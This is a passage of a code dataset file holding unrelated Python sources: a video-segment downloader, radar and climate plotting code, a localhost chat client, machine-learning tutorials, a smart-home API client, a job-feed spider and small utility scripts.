Pool(30)\n # data shared between processes\n m = Manager()\n d = m.list()\n d.extend([0, len(download_list)])\n try:\n # generate the ts download tasks\n for i in download_list:\n i = str(i)\n # n is the number of zeros to prepend\n n = length - len(i)\n zero = \"0\" * n + i # file names must be padded, otherwise merging breaks\n if pat_mode == \"zero\":\n index = zero\n else:\n index = i\n url_file = url_pat.format(index)\n # path of the file to download\n path_file = path_dir + r'\\\\' + \"{0}.ts\".format(zero)\n # start the async task\n 
pool.apply_async(self.download, (url_file, path_file, d))\n finally:\n pool.close()\n pool.join()\n\n def download(self, url, path, d):\n \"\"\"\n :param d: counter shared by the worker processes\n \"\"\"\n args = {\n \"referer\": self.referer,\n \"origin\": self.origin,\n \"proxy\": self.proxy,\n \"need\": \"response\"\n }\n ts_stream = send_requests(url, **args)\n with open(path, \"wb\") as f:\n f.write(ts_stream.content)\n f.close()\n d[0] += 1\n show_bar(d[0], d[1])\n","sub_path":"comunits.py","file_name":"comunits.py","file_ext":"py","file_size_in_byte":10699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"446754467","text":"import unittest\n\nfrom tests.py_bindings.scenario import scenario_test, take_screenshot_scenario_test\n# import sys\n\n\ndef suite():\n return unittest.TestSuite((\n unittest.makeSuite(scenario_test.ScenarioTestCase),\n unittest.makeSuite(take_screenshot_scenario_test.TakeScreenshotScenarioTestCase)\n ))\n\n\ndef main():\n result = unittest.TextTestRunner(verbosity=2).run(suite())\n #sys.exit(not result.wasSuccessful())\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"tests/py_bindings/test_suite.py","file_name":"test_suite.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"261241849","text":"import atmPy.general.timeseries as _timeseries\nimport matplotlib.pylab as plt\nfrom matplotlib.colors import LogNorm as _LogNorm\nimport numpy as _np\nfrom copy import deepcopy as _deepcopy\n\nclass Reflectivity(_timeseries.TimeSeries_2D):\n def __init__(self, *args, parent=None, **kwargs):\n super().__init__(*args, **kwargs)\n self._parent = parent\n\n def plot(self, snr_max=None, norm='linear', **kwargs):\n if 'pc_kwargs' in kwargs:\n pc_kwargs = kwargs['pc_kwargs']\n else:\n pc_kwargs = {}\n\n if 'cmap' not in pc_kwargs:\n pc_kwargs['cmap'] = plt.cm.gist_gray_r\n if 'norm' not in pc_kwargs:\n if norm == 'log':\n print(norm)\n pc_kwargs['norm'] = _LogNorm()\n # if 'vmin' not in pc_kwargs:\n # pc_kwargs['vmin'] = vmin\n\n kwargs['pc_kwargs'] = pc_kwargs\n\n if snr_max:\n refl = self.copy()\n refl.data[self._parent.signal2noise_ratio.data < snr_max] = _np.nan\n out = refl.plot(norm=norm, **kwargs)\n else:\n out = super().plot(**kwargs)\n return out\n\nclass Kazr(object):\n def __init__(self):\n self._reflectivity = None\n self._signal2noise_ratio = None\n\n def average_time(self, window):\n \"\"\"\n Averages each of the relevant properties. See timeseries.TimeSeries.average_time for details.\n Parameters\n ----------\n window: tuple\n e.g. (1,'m')\n\n Returns\n -------\n Kazr instance with changes applied\n \"\"\"\n\n kzr = self.copy()\n kzr.reflectivity = kzr.reflectivity.average_time(window)\n return kzr\n\n\n def zoom_time(self, start=None, end=None, copy=True):\n kazrnew = self.copy()\n kazrnew.reflectivity = self.reflectivity.zoom_time(start=start, end=end, copy=copy)\n kazrnew.signal2noise_ratio = self.signal2noise_ratio.zoom_time(start=start, end=end, copy=copy)\n return kazrnew\n\n def discriminate_by_signal2noise_ratio(self, minimu_snr):\n \"\"\"I know there is that kwarg in the plot function which allows me to do this. This was necessary in order to\n average over time and still be able to discriminate through the snr. 
After averaging over time the snr is\n useless.\n\n Parameters\n ----------\n minimu_snr: float\n All values of reflectivity where the snr is smaller than that value are set to nan.\n\n Returns\n -------\n Kazr instance with changes applied\n \"\"\"\n\n kzr = self.copy()\n kzr.reflectivity.data[self.signal2noise_ratio.data < minimu_snr] = _np.nan\n return kzr\n\n @property\n def reflectivity(self):\n return self._reflectivity\n\n @reflectivity.setter\n def reflectivity(self, value, **kwargs):\n if type(value).__name__ == 'Reflectivity':\n self._reflectivity = value\n else:\n self._reflectivity = Reflectivity(value, parent=self, **kwargs)\n\n @property\n def signal2noise_ratio(self):\n return self._signal2noise_ratio\n\n @signal2noise_ratio.setter\n def signal2noise_ratio(self, value, **kwargs):\n if type(value).__name__ == 'TimeSeries_2D':\n self._signal2noise_ratio = value\n else:\n self._signal2noise_ratio = _timeseries.TimeSeries_2D(value, **kwargs)\n\n def copy(self):\n return _deepcopy(self)\n","sub_path":"atmPy/precipitation/radar.py","file_name":"radar.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"253532865","text":"from mpl_toolkits.basemap import Basemap\nfrom netCDF4 import Dataset as open_ncfile\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import BoundaryNorm\n\n#-- call function and plot figure\nfig, ax = plt.subplots(figsize=(7.5,6.5))\n\nfile = open_ncfile('rx1day_ANN_CCCMA3.1_R1_d01_1990-2009.nc')\n\n### read in coordinates\nlat = file.variables['y'][:]*(-1) ### invert latitude (not sure whether that's necessary?)\nlon = file.variables['x'][:]\n\n### read in variable and choose the 11th timestep\ndata = file.variables['rx1day'][10,:,:]\n\n#-- create map, you can change the region by defining the upper and lower lat and lon\nmap = Basemap(projection='cyl',llcrnrlat= -44.75,urcrnrlat=-10.25,\\\n resolution='c', llcrnrlon=110.,urcrnrlon=160.)\n\n#-- draw coastlines and edge of map\nmap.drawcoastlines()\nx, y = map(*np.meshgrid(lon, lat))\n\ncut_data = data[:-1, :-1]\ncmap = plt.cm.viridis_r\n\n### Reduce white areas\nplt.subplots_adjust(top=0.95, left=0.02, right=0.98, bottom=0.10,\n wspace=0.03, hspace=0.15)\n\nplt.title('Rx1day Australia')\n\nlevels = np.arange(0,110,10)\nnorm = BoundaryNorm(levels, ncolors=cmap.N, clip=True)\ncnplot = map.pcolormesh(x, y, cut_data, cmap=cmap, norm=norm)\n\n### Move colorbar horizontal or vertical direction, make it wider or change height\ncax = plt.axes([0.2, 0.1, 0.6, 0.02])\n\n### Decide whether horizontal or vertical orientation\ncbar=fig.colorbar(cnplot, orientation='horizontal', cax=cax)\ncbar.ax.tick_params(labelsize=10)\nplt.colorbar(ticks = levels, cax=cax, orientation='horizontal')\ncbar.set_label('Random PPT stat',fontsize=10)\n\n### Helps you manage white space\n\nplt.subplot_tool()\nplt.show()\n# plt.savefig('crap.png', dpi = 500)\n","sub_path":"crap_map_script.py","file_name":"crap_map_script.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"352752589","text":"import socket\nimport errno\nimport sys\nfrom datetime import datetime\nimport time\nfrom threading import Thread\n\n# initial variables\nHEADER_LENGTH = 10\nIP = '127.0.0.1'\nPORT = 1234\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient_socket.connect((IP,PORT))\nclient_socket.setblocking(False)\n\n# declaring 
username\nmy_username = input(\"Your username: \")\n\n# sending username to server\nusername = my_username.encode('utf-8')\nusername_header = f'{len(username):<{HEADER_LENGTH}}'.encode('utf-8')\nclient_socket.send(username_header+username)\n\n\n# successful connection\nwhile True:\n date_time_stamp = datetime.fromtimestamp(time.time())\n message = input(f\"[{date_time_stamp.strftime('%Y-%m-%d %H:%M:%S')}]: {my_username} > \")\n\n # if message is written - print it for client and send to server\n if message:\n message = message.encode('utf-8')\n message_header = f'{len(message) :< {HEADER_LENGTH}}'.encode('utf-8')\n client_socket.send(message_header + message)\n try:\n # receive messages\n while True:\n username_header = client_socket.recv(HEADER_LENGTH)\n if not len(username_header):\n print(\"Connection closed by the server\")\n sys.exit()\n\n # decoding message\n username_length = int(username_header.decode('utf-8').strip())\n username = client_socket.recv(username_length).decode('utf-8')\n message_header = client_socket.recv(HEADER_LENGTH)\n message_length = int(message_header.decode('utf-8').strip())\n message = client_socket.recv(message_length).decode('utf-8')\n\n # printing message with system time from client [should be from server - working on it]\n date_time_stamp = datetime.fromtimestamp(time.time())\n print(f\"[{date_time_stamp.strftime('%Y-%m-%d %H:%M:%S')}]: {username} > {message}\")\n\n\n# handling exceptions\n except IOError as e:\n if e.errno != errno.EAGAIN and e.errno != errno.EWOULDBLOCK:\n print('Reading error', str(e))\n sys.exit()\n continue\n\n except Exception as e:\n print('General error',str(e))\n sys.exit()\n\n\n\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"191662121","text":"import os\n\nimport matplotlib.pyplot as plt\n\nimport pandas as pd\n# pd.set_option('display.width', None)\n# pd.set_option('display.max_columns', None)\nimport numpy as np\n\nfrom sklearn import preprocessing\nfrom sklearn.naive_bayes import GaussianNB, ComplementNB\nfrom sklearn.metrics import accuracy_score\n\n#df_train = pd.read_csv(os.path.join('.', 'data', 'processed', 'train.csv'))\ndf_train = pd.read_csv(os.path.join('.', 'data', 'processed', 'train_balanced.csv'))\ndf_train = df_train.sample(frac=1).reset_index(drop=True)\ndf_test = pd.read_csv(os.path.join('.', 'data', 'processed', 'test.csv'))\ndf_test = df_test.sample(frac=1).reset_index(drop=True)\n\nFEATURES = [\n\t# 'UserID',\n\t# 'UUID',\n\t# 'Version',\n\t# 'TimeStemp',\n\t'GyroscopeStat_x_MEAN',\n\t'GyroscopeStat_z_MEAN',\n\t'GyroscopeStat_COV_z_x',\n\t'GyroscopeStat_COV_z_y',\n\t#'MagneticField_x_MEAN',\n\t#'MagneticField_z_MEAN',\n\t#'MagneticField_COV_z_x',\n\t#'MagneticField_COV_z_y',\n\t#'Pressure_MEAN',\n\t'LinearAcceleration_COV_z_x',\n\t'LinearAcceleration_COV_z_y',\n\t'LinearAcceleration_x_MEAN',\n\t'LinearAcceleration_z_MEAN',\n\t# 'attack'\n\t]\n\nX_train = df_train[FEATURES]\nX_test = df_test[FEATURES]\n\ny_train = df_train['attack']\ny_test = df_test['attack']\n\n## [ NORMALIZATION ]\nscaler = preprocessing.MinMaxScaler().fit(X_train)\nX_train = scaler.transform(X_train)\n\nX_test = scaler.transform(X_test)\n\n\n## [ NAIVE-BAYES MODEL ]\n\n#model = GaussianNB()\nmodel = ComplementNB()\nmodel.fit(X_train, y_train)\n\ny_pred = model.predict(X_test)\n\nacc = accuracy_score(y_test, y_pred)\nprint(\"Accuracy:\", acc)\n\n# metrics calculation\nfrom sklearn.metrics 
import mean_absolute_error\nmae = mean_absolute_error(y_test, y_pred)\nprint(\"MAE:\", mae)\n\n\nxx = np.arange(len(y_test))\nplt.scatter(xx, y_test, c='r', label='data')\nplt.plot(xx, y_pred, c='g', label='prediction')\nplt.axis('tight')\nplt.legend()\nplt.title('Component NaiveBayes')\nplt.show()\n\n\n\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.utils.multiclass import unique_labels\n\ndef plot_confusion_matrix(y_true, y_pred, classes,\n normalize=False,\n title=None,\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if not title:\n if normalize:\n title = 'Normalized confusion matrix'\n else:\n title = 'Confusion matrix, without normalization'\n\n # Compute confusion matrix\n cm = confusion_matrix(y_true, y_pred)\n # Only use the labels that appear in the data\n classes = classes[unique_labels(y_true, y_pred)]\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n fig, ax = plt.subplots()\n im = ax.imshow(cm, interpolation='nearest', cmap=cmap)\n ax.figure.colorbar(im, ax=ax)\n # We want to show all ticks...\n ax.set(xticks=np.arange(cm.shape[1]),\n yticks=np.arange(cm.shape[0]),\n # ... and label them with the respective list entries\n xticklabels=classes, yticklabels=classes,\n title=title,\n ylabel='True label',\n xlabel='Predicted label')\n\n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\n rotation_mode=\"anchor\")\n\n # Loop over data dimensions and create text annotations.\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i in range(cm.shape[0]):\n for j in range(cm.shape[1]):\n ax.text(j, i, format(cm[i, j], fmt),\n ha=\"center\", va=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n fig.tight_layout()\n return ax\n\nplot_confusion_matrix(y_test, y_pred, classes=unique_labels(y_test, y_pred), normalize=True,\n title='Normalized confusion matrix')\n\nplt.ylim((-0.5, 1.5))\nplt.show()","sub_path":"Task3/src/naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"361874999","text":"import tensorflow as tf\nimport os\nimport numpy as np\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n\ndef linear_model_fn():\n\n # Model parameters\n W = tf.Variable([.3], tf.float32)\n b = tf.Variable([-.3], tf.float32)\n\n # Model input and output\n x = tf.placeholder(tf.float32)\n linear_model = W * x + b\n y = tf.placeholder(tf.float32)\n\n # loss\n loss = tf.reduce_sum(tf.square(linear_model - y)) # sum of the squares\n\n # optimizer\n optimizer = tf.train.GradientDescentOptimizer(0.01)\n train = optimizer.minimize(loss)\n\n # training data\n x_train = [1, 2, 3, 4]\n y_train = [0, -1, -2, -3]\n\n # training loop\n init = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init) # reset values to wrong\n for i in range(1000):\n sess.run(train, {x: x_train, y: y_train})\n\n # evaluate training accuracy\n curr_W, curr_b, curr_loss = sess.run([W, b, loss], {x: x_train, y: y_train})\n print(\"W: %s b: %s loss: %s\" % (curr_W, curr_b, curr_loss))\n return 0\n\ndef linear_model_fn_simple():\n # Declare list of features. We only have one real-valued feature. 
There are many\n # other types of columns that are more complicated and useful.\n features = [tf.contrib.layers.real_valued_column(\"x\", dimension=1)]\n\n # An estimator is the front end to invoke training (fitting) and evaluation\n # (inference). There are many predefined types like linear regression,\n # logistic regression, linear classification, logistic classification, and\n # many neural network classifiers and regressors. The following code\n # provides an estimator that does linear regression.\n estimator = tf.contrib.learn.LinearRegressor(feature_columns=features)\n\n # TensorFlow provides many helper methods to read and set up data sets.\n # Here we use `numpy_input_fn`. We have to tell the function how many batches\n # of data (num_epochs) we want and how big each batch should be.\n x = np.array([1., 2., 3., 4.])\n y = np.array([0., -1., -2., -3.])\n input_fn = tf.contrib.learn.io.numpy_input_fn({\"x\": x}, y, batch_size=4,\n num_epochs=1000)\n\n # We can invoke 1000 training steps by invoking the `fit` method and passing the\n # training data set.\n estimator.fit(input_fn=input_fn, steps=1000)\n\n # Here we evaluate how well our model did. In a real example, we would want\n # to use a separate validation and testing data set to avoid overfitting.\n estimator.evaluate(input_fn=input_fn)\n\n return 0\n\ndef mnist_fn():\n mnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n print(\"tu\")\n\n x = tf.placeholder(tf.float32, [None, 784])\n\n W = tf.Variable(tf.zeros([784, 10]))\n b = tf.Variable(tf.zeros([10]))\n\n y = tf.nn.softmax(tf.matmul(x, W) + b)\n\n y_ = tf.placeholder(tf.float32, [None, 10])\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))\n train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\n\n sess = tf.InteractiveSession()\n\n tf.global_variables_initializer().run()\n\n for _ in range(1000):\n batch_xs, batch_ys = mnist.train.next_batch(100)\n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})\n\n correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\n\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n print(sess.run(accuracy, feed_dict={x: mnist.test.images, y_: mnist.test.labels}))\nif __name__ == \"__main__\":\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n mnist_fn()\n\n print(1)\n","sub_path":"tensorFlow_get_started.py","file_name":"tensorFlow_get_started.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"260992200","text":"import logging\n\nimport requests\n\nfrom main import app\n\n\ndef get_api_url(endpoint):\n return \"http://{}:{}{}\".format(app.config['API_HOSTNAME'], app.config['API_PORT'], endpoint)\n\n\ndef get_user_id():\n # TODO: remove once login functionality has been made\n r = requests.get(get_api_url('/user/default_user'))\n data = r.json()\n return data['user_id']\n\n\ndef get_default_house_id():\n return get_current_user_houses()[0][\"house_id\"]\n\n\ndef get_current_user_houses():\n return get_houses_for_user(get_user_id())\n\n\ndef get_houses_for_user(user_id):\n r = requests.get(get_api_url('/user/{}/houses'.format(user_id)))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['houses']\n\n\ndef get_user_default_rooms():\n r = requests.get(get_api_url('/house/{}/rooms'.format(get_default_house_id())))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return 
data['rooms']\n\n\ndef get_default_house_id_for_user(user_id):\n return get_houses_for_user(user_id)[0][\"house_id\"]\n\n\ndef get_default_rooms_for_user(user_id):\n r = requests.get(get_api_url('/house/{}/rooms'.format(get_default_house_id_for_user(user_id))))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['rooms']\n\n\ndef add_new_device(name, device_type, vendor, configuration):\n r = requests.post(get_api_url('/house/{}/devices/add'.format(get_default_house_id())),\n json={\"name\": name,\n \"configuration\": configuration,\n \"device_type\": device_type,\n \"vendor\": vendor})\n logging.debug(\"Received from add new device: {}\".format(r.content))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['device']['_id']\n\n\ndef add_new_room(name):\n r = requests.post(get_api_url('/house/{}/rooms/add'.format(get_default_house_id())),\n json={\"name\": name})\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['room']['room_id']\n\n\ndef get_user_default_devices():\n r = requests.get(get_api_url('/house/{}/devices'.format(get_default_house_id())))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data[\"devices\"]\n\n\ndef get_room_devices(room_id):\n r = requests.get(get_api_url('/room/{}/devices'.format(room_id)))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['devices']\n\n\ndef link_device_to_room(room_id, device_id):\n r = requests.get(get_api_url('/room/{}/device/{}/link'.format(room_id, device_id)))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['device']['device_id']\n\n\ndef get_house_info(house_id):\n r = requests.get(get_api_url('/house/{}'.format(house_id)))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['house']\n\n\ndef get_room_info(room_id):\n r = requests.get(get_api_url('/room/{}'.format(room_id)))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['room']\n\n\ndef get_device_info(device_id):\n r = requests.get(get_api_url('/device/{}'.format(device_id)))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['device']\n\n\ndef set_thermostat_target(device_id, target_temperature):\n r = requests.post(get_api_url('/device/{}/thermostat/configure'.format(device_id)),\n json={\"target_temperature\": target_temperature})\n print(r.content)\n data = r.json()\n if data['error'] is not None:\n raise Exception('Error!')\n return data['device']\n\n\ndef set_switch_state(device_id, state):\n r = requests.post(get_api_url('/device/{}/switch/configure'.format(device_id)),\n json={\"power_state\": state})\n print(r.content)\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['device']\n\n\ndef get_faulty_devices():\n r = requests.get(get_api_url('/devices/faulty'))\n data = r.json()\n if data['error'] is not None:\n raise Exception('Error!')\n return data['devices']\n\n\ndef get_user_info(user_id):\n r = requests.get(get_api_url(\"/user/{}\".format(user_id)))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data[\"user\"]\n\n\ndef get_all_users():\n r = requests.get(get_api_url(\"/users\"))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return 
data['users']\n","sub_path":"website/data_interface/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"490973187","text":"\"\"\"\n GovernmentJobsXML spider created on top of the XMLSpider\n\nscrapy crawl governmentjobs_xml -a mining_job_id=999 -a iteration=1 -a extract=1 -a url=\"https://www.governmentjobs.com/SearchEngine/IndeedJobsFeed\"\n\nsample url:\n https://www.governmentjobs.com/SearchEngine/IndeedJobsFeed\n\"\"\"\n\nfrom re import compile\nfrom urlparse import urlparse\nfrom brightcorp.base.xmlspider import XMLSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import ConvertDateString, Prefix, NormalizedJoin\n\n\nclass GovernmentJobsXML(XMLSpider):\n\n name = 'governmentjobs_xml'\n tag = 'job'\n follow_job_url = False\n DATE_REGEX = compile(r'^(.*?\\d{4})\\s*\\d{2}:\\d{2}:')\n\n date_xpath = '//date/text()'\n fields = {\n 'url': '//url/text()',\n 'apply_url': '//url/text()',\n 'title': '//title/text()',\n 'company': '//company/text()',\n 'description': '//description/text()',\n 'jobcategory': '//category/text()',\n 'jobtype': '//jobtype/text()',\n }\n\n location_xpaths = [\n '//city/text()',\n '//state/text()',\n '//country/text()'\n ]\n\n def __init__(self, *args, **kwargs):\n super(GovernmentJobsXML, self).__init__(*args, **kwargs)\n\n self.domain = urlparse(self.start_urls[0]).netloc.split('.')[1]\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n\n for field, xpath in self.fields.iteritems():\n loader.add_xpath(field, xpath)\n\n loader.add_xpath(\n 'location', self.location_xpaths, NormalizedJoin(', ')\n )\n loader.add_xpath(\n 'referencenumber',\n '//referencenumber/text()',\n Prefix('%s-' % self.domain)\n )\n loader.add_xpath(\n 'date',\n self.date_xpath,\n ConvertDateString('%a, %d %b %Y'),\n re=self.DATE_REGEX\n )\n\n yield loader.load_item()","sub_path":"brightcorp/brightcorp/spiders/governmentjobs_xml.py","file_name":"governmentjobs_xml.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"587101780","text":"#!/usr/bin/python\n\nfrom sys import argv\nfrom os import system\nfrom os.path import abspath\n\n\ngdt_file = argv[1]\n\ngdt_servers_file = gdt_file.replace( '.txt','_servers.txt')\nsystem( 'grep _TS %s > %s' % ( gdt_file, gdt_servers_file ) )\n\ngdt_submissions_file = gdt_file.replace( '.txt','_submissions.txt')\nsystem( 'grep casp %s > %s' % ( gdt_file, gdt_submissions_file ) )\n\ngnuplot_file = 'make_gdt_histograms.gplot'\nfid = open( gnuplot_file, 'w' )\n\nfid.write( 'plot \"< histo.py %s 4 0.005 0 1.0\" u 1:2 w lines\\n' % gdt_servers_file )\nfid.write( 'replot \"< histo.py %s 4 0.005 0 1.0\" u 1:2 w lines lt 3\\n' % gdt_submissions_file )\nfid.write( 'set title \"%s\"\\n' % abspath( gdt_file) )\n\nfid.write( 'set term post color\\n' )\nfid.write( 'set out \"gdt_histograms.ps\" \\n')\n\nfid.write( 'replot\\n' )\nfid.write( 'set term x11\\n' )\nfid.write( 'set out\\n' )\n\nfid.close()\n\nsystem( 'gnuplot %s ' % gnuplot_file )\n\n\n","sub_path":"casp_scripts/check_gdt_histograms.py","file_name":"check_gdt_histograms.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"378170633","text":"from tkinter import *\nimport subprocess #do otwierania folderow\nimport os #do 
tworzenia folderow\nimport datetime #do pobierania daty\nfrom tkinter.filedialog import askopenfilename #do wybierania pliku\nimport shutil #kopiowanie pliku\nimport time #odliczanie sekund rysowania\nimport math #do zaokraglen\n\n\nPROJECTS_DIR = \".\\Projects\"\nDRAWING = False\nstart = 0\ntodayTimer = 0\nsumTodayTimer = 0\n\n#funkcje\n\ndef copyFileToActualWeekFolder():\n createFolder(PROJECTS_DIR+'\\\\'+getWeekId())\n try:\n srcFilePath = selectFile()\n extension = os.path.splitext(srcFilePath)[1][1:]\n now = datetime.datetime.now()\n dstFilePath = PROJECTS_DIR+'\\\\'+getWeekId()+'\\\\'+now.strftime(\"%A\")+'.'+extension\n #os.system('copy '+srcFilePath+' '+dstFilePath)\n shutil.copy2(srcFilePath, dstFilePath)\n print(\"Copied from \\n\"+srcFilePath+\"\\nto\\n\"+dstFilePath)\n except:\n print(\"ERROR copyFileToActualWeekFolder()\")\n pass\n\ndef selectFile():\n #returns path to file\n filename = askopenfilename(initialdir = \"/\",title = \"Wybierz pracę\",filetypes = ((\"jpeg files\",\"*.jpg\"),(\"png files\",\"*.png\")))\n print(filename)\n return filename\n\ndef drawingTimer():\n global DRAWING\n global start\n global todayTimer\n global sumTodayTimer\n isOkay = False\n if(DRAWING == False):\n print(\"Started drawing!\")\n start = time.time()\n DRAWING = True\n isOkay = False\n return 0\n if(DRAWING == True):\n print(\"Stopped drawing!\")\n end = time.time()\n DRAWING = False\n isOkay = True\n if(isOkay):\n print(\"Time passed: \"+str(math.ceil(end-start)))\n todayTimer = todayTimer + math.ceil(end-start)\n print(\"Time today: \"+str(todayTimer))\n return todayTimer\n\ndef returnTimeDrawing():\n return todayTimer\n\ndef getWeekId():\n #returns string year+week_number\n now = datetime.datetime.now()\n dt = datetime.date(now.year, now.month, now.day)\n wk = dt.isocalendar()[1]\n return str(now.year)+\" \"+str(wk)\n\ndef createFolder(location):\n try:\n if not os.path.isdir(location):\n os.makedirs(location)\n print(\"Folder created\")\n else:\n print(\"Folder exists\")\n except:\n print(\"ERROR createFolder()\")\n pass\n\ndef openFolder(location):\n createFolder(location)\n subprocess.Popen('explorer \"'+location+'\"')\n print(\"Opening \"+location)\n\ndef clock():\n infoDzisiejszyTimerLabel.config(text=\"Dziś rysujesz: \"+str(math.floor(returnTimeDrawing()/3600)%24)+\":\"+str(math.floor(returnTimeDrawing()/60)%60)+\":\"+str(returnTimeDrawing()%60))\n if(DRAWING == True):\n otworzFolderGlownyButton.config(state=DISABLED)\n otworzFolderTygodniowyButton.config(state=DISABLED)\n dodajPraceButton.config(state=DISABLED)\n rysujButton.config(text=\"Zatrzymaj rysowanie\")\n if(DRAWING == False):\n otworzFolderGlownyButton.config(state=\"normal\")\n otworzFolderTygodniowyButton.config(state=\"normal\")\n dodajPraceButton.config(state=\"normal\")\n rysujButton.config(text=\"Kontynuuj rysowanie\")\n master.after(100,clock)\n\nmaster = Tk()\nmaster.title('DrawIt!')\n\notworzFolderGlownyButton = Button(master, text=\"Otwórz folder ze wszystkimi tygodniami\", command=lambda:openFolder(\".\\Projects\"))\notworzFolderGlownyButton.pack()\n\notworzFolderTygodniowyButton = Button(master, text=\"Otwórz folder tego tygodnia\", command=lambda:openFolder(\".\\Projects\\\\\"+getWeekId()))\notworzFolderTygodniowyButton.pack()\n\ndodajPraceButton = Button(master, text=\"Dodaj dzisiejszą pracę\", command=lambda:copyFileToActualWeekFolder())\ndodajPraceButton.pack()\n\n#master.state('zoomed') #fullscreen?\n\ninfoAktualnyTydzienLabel = Label(master, text=\"Aktualny tydzień: 
\"+getWeekId())\ninfoAktualnyTydzienLabel.pack()\n\nprint (\"Current year and week \"+getWeekId())\n\nrysujButton = Button(master, text=\"Kontynuuj rysowanie\", command=lambda:drawingTimer())\nrysujButton.pack()\n\ninfoDzisiejszyTimerLabel = Label(master, textvariable=\"\")\ninfoDzisiejszyTimerLabel.pack()\n\nclock()\nmaster.mainloop()\nprint(\"ENDING\")\n\n\n","sub_path":"Windows/src/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"311645733","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAdversarial Robustness Study of Convolutional Neural Network for Lumbar Disk Shape Reconstruction from MR images \n(Jiasong Chen, Linchen Qian, Timur Urakov, Weiyong Gu, Liang Liang at University of Miami)\npublished at SPIE Medical Imaging: Image Processing, 2021\n\n\"\"\"\nimport os \nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom IPython import display\nimport torch\nfrom torch.optim import Adamax\nfrom tqdm import tqdm\nimport argparse\nfrom Lumbar_Dataset import DiskSet\nfrom Lumbar_Dataset import DiskSet_example\nfrom Resnet18Unet import Resnet18Unet\nfrom PCA_Aug import PCA_Aug_Dataloader\nfrom Disk_regseg_train import train, test, plot_history, save_checkpoint, load_checkpoint\n#%%\n#https://pytorch.org/docs/stable/notes/randomness.html\n#https://pytorch.org/docs/stable/cuda.html\nimport random\nrandom.seed(0)\nnp.random.seed(0)\ntorch.manual_seed(0)\ntorch.cuda.manual_seed(0)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nos.environ['PYTHONHASHSEED'] = str(0)\n#%%\nif __name__ == '__main__':\n #%%\n parser = argparse.ArgumentParser(description='Input Parameters:')\n parser.add_argument('--net_name', default='Resnet18Unet', type=str)\n parser.add_argument('--n_components', default=10, type=int)\n parser.add_argument('--n_batches', default=100, type=int)\n parser.add_argument('--epoch_start', default=0, type=int)\n parser.add_argument('--epoch_end', default=1000, type=int)\n 